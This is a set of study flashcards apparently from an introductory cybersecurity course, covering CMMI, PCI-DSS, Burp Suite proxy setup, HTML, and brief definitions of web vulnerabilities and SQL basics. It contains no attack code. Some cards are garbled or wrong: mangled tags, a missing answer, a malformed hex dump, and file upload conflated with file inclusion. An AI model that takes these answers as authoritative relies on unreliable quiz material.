Phase 3 Flashcards
What does CMMI stand for?
Capability Maturity Model Integration
How many levels are there in CMMI?
5
At which level of CMMI are processes characterized throughout the organization?
Defined
Optimizing
Managed
Quantitatively Managed
Defined
PCI-DSS has how many objectives?
6
At which level of CMMI are processes unpredictable and/or poorly controlled?
Initial
Which of the following are the significant compliance drivers used to manage a GRC program effectively? (select all that apply)
Regulatory
Compliance
Contractual
Organizational
Regulatory
Contractual
Organizational
What is the default port used by burp suite for the proxy
8080
When using burp suite as a proxy, what default IP address should be pointed to for the proxy
Localhost
What additional steps are necessary to be able to access an https site using a proxy
The proxy’s TLS root CA certificate must be installed in the browser’s CA store
In which section of an html document would the <title></title> tags normally be used
<head> section
</head>
Which of these is the anchor tag?
<ing>
<div>
<anchor>
<a>
</a></anchor></div></ing>
<a></a>
What is inline content
When all html and other elements exist in one single page
What is linked content
When one page has html with references to separate files containing css and Javascript
What type of vulnerability allows attackers to execute unauthorized commands on the server by exploiting improperly sanitized input fields?
Command Injection .
Is a vulnerability that allows an attacker to execute arbitrary commands on a host operating system through a vulnerable app
Which Attack uses the users currently authenticate session to forge a request to a web application ?
Cross site request forgery (csrf) tricks the victim into submitting a malicious request.
What vulnerability occurs when a web application allows the upload of executable scripts as files?
File inclusion lfi. And upload vulnerability
These vulnerabilities allow attackers to include files on the server or upload dangerous files to a server
LFI local file inclusion
Rfi remote file inclusion
What vulnerability is present if an attacker can programmatically bypass a web application captcha
Using an insecure captcha occur when captcha implementation is weak allowing automated systems to attack
Which vulnerability allows attackers to manipulate backend databases through unsanitized input fields
SQL injection involves inserting a SQL query via the input data from the client to the application
What vulnerability could allow an attacker to predict or brute force a session token
Weak session ids are vulnerable to interception or prediction, allowing attackers to hijack a users session
What type of vulnerability allows attackers to inject client-side scripts into web pages viewed by other users
Cross-site scripting(xss) allows attackers to inject malicious scripts into content viewed by other users. Stored xss persists on the server, while reflected xss is returned in the response
What are the 6 levels of the software development cycle
Planning
Analysis
Design
Implementation
Testing and integration
Maintenance
Where is the default Apache configuration file in fedora linux?
/etc/httpd/conf
Why should the 404 page be customized
Obfuscate the details about apache server, to minimize known attacks
What is java
A compiled, statically typed language that is used to develop a wide variety of applications, including desktop software, mobile apps and web servers
What is javascript
Interpreted dynamically typed language primarily used to add interactivity to web pages
What is Metadata?
Data about the data or object
What designates Javascript in an html document?
What is Race condition?
An attack method where attacker races against a vulnerable application by exploiting the gap between testing and accessing the file. Also known as TOCTOU
How many directories deep does mkdir -p $(python3 -c ‘print (“A/”*50)’) create?
50
In the command mkdir -p $(python3 -c ‘print(“A/”*50)’) what does the -p do?
Creates parent directories, as needed
Which SQL command allows us to query a database for current values?
SELECT
Which SQL command returns all the values in a table named people?
SELECT * FROM people;
Which SQL command allows new records to be created in a table called people?
INSERT INTO people (username,firstname,lastname,pass) VALUES(“uname”,”some”,”one”,”password1!);
Where does PHP scripting run?
Server side
Why would a programmer choose a compiled language instead of an interpreted one?
Compiled code tends to be faster and more efficient
Using xdd on a file, you get the following output. What type of file is this?
00000000: 2321 2f62 686e 2f62 6173 680a
Bash script
What does -m32 flag do with gcc?
Compiles code into 32bit binary
